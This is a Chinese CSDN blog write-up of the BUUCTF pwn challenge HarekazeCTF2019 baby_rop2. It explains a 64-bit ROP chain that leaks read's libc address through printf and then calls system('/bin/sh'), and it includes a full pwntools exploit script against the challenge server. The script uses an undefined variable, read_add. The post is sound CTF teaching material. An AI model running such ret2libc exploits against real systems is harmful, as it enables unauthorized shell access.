[CTF]BUUCTF-PWN-[HarekazeCTF2019]baby_rop2

原创 于 2023-04-13 09:50:45 发布
· 290 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c语言 #网络安全 #python

文章详细介绍了如何利用64位程序的栈溢出漏洞,通过ROPgadgets进行pop指令的组合,以泄露libc的read函数地址。然后使用printf函数进一步泄露地址,最终获取system和bin_sh的地址,实现命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

程序分析

  • ida
    在这里插入图片描述

解题思路

漏洞
  • 本题存在栈溢出,但是不存在/bin/sh,因此需要泄露libc版本查找
  • 本程序为64位程序,传参时前6个参数用寄存器rdi,rsi,rdx,rcx,r8,r9传递,其余参数才能通过栈传递
64位传参顺序

rdi->rsi->rdx->rcx->r8->r9

ROPgadget
  • 需要寻找pop rdi,pop rsi,发现没有单独使用rsi的指令,但是我们可以利用含有rsi,r15的
ROPgadget --binary 'babyrop2 '  --only "pop|ret"

0x0000000000400733 : pop rdi ; ret
0x0000000000400731 : pop rsi ; pop r15 ; ret
利用printf泄露函数地址

  • 参数类型为printf(“%s”,address)

  • 第一个参数我们利用程序自带的Welcome to the Pwn World again, %s字串,第二个参数选择打印read函数的真正地址来泄露lib利用printf来打印泄露的read的地址,需要给printf设置格式化字符,所以在题目中找到现成的%s地址,%s所在的地址是0x400770
    在这里插入图片描述

    fm_str = 0x400770

    printf函数原型,format输出内容的格式(fm_str),[argument]输入的内容

    int printf(const char *format, [argument]...)
payload1
payload1 = b'a'*0x28 + p64(rdi_1) + p64(format_1) + p64(rsi_1)+p64(read_got) + p64(0) + p64(printf_plt) + p64(main_1)

下面是对上述payload1的解释

  • *b’a’0x28:填充buf和rop

  • p64(rdi_1) + p64(format_1):该指令为"pop rdi;ret ",该指令将p64(format_1)赋值给寄存器rdi,为printf的第一个参数

  • p64(rsi_1)+p64(read_got) + p64(0) :pop rsi;pop r15;ret执行后将p64(read_got)赋值给寄存器rsi,printf的第二个参数,将p64(0)赋值给寄存器r15,无意义

  • p64(printf_plt):执行ret指令后,返回到printf在plt表中的地址,相当于执行printf函数

  • p64(main_1):printf函数的返回地址,得到read真正地址后返回程序开始,重新执行

接收read地址
read_1 = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

接收地址基本都是7个字节开头的,7f开头,补全8个字节

payload2
payload2 = b'a'*0x28 + p64(rdi_add) + p64(bin_add) +p64(sys_add)
cat flag

注意,这里不能直接ls得到flag,需要使用一些linux小命令

cd /home/babyrop2
cat flag

在这里插入图片描述

exp

from pwn import*
from LibcSearcher import *
context.log_level = 'debug'
p = remote("node4.buuoj.cn",25684)

elf = ELF("'babyrop2' ")
main_1 = elf.sym['main']
printf_plt = elf.plt['printf']
read_got = elf.got['read']

rdi_1 = 0x400733
rsi_1 = 0x400731
format_1 = 0x400770

payload1 = b'a'*0x28 + p64(rdi_1) + p64(format_1) + p64(rsi_1)+p64(read_got) + p64(0) + p64(printf_plt) + p64(main_1)
p.recvuntil("name?")
p.sendline(payload1)
read_1 = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_1))

libc = LibcSearcher('read',read_1)
libc_base = read_add - libc.dump ('read')
sys_1 = libc_base + libc.dump('system')
bin_1 = libc_base + libc.dump('str_bin_sh')

payload2 = b'a'*0x28 + p64(rdi_1) + p64(bin_1) +p64(sys_1)
p.recvuntil("name?")
p.sendline(payload2)
p.interactive()
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 293
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 959
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 447
IDA Pro 静态调试。依旧可以使用上次的PoC。
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1776
题目地址pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1547
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 897
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 498
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 489
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 573
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[HarekazeCTF2019]baby_rop2BUUCTF
qq_41696518的博客
09-02 442
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露真实的libc载入基址本题即可求解。由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9。
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1776
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 5090
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 326
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
buuctf-pwn入门
最新发布
01-26
BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值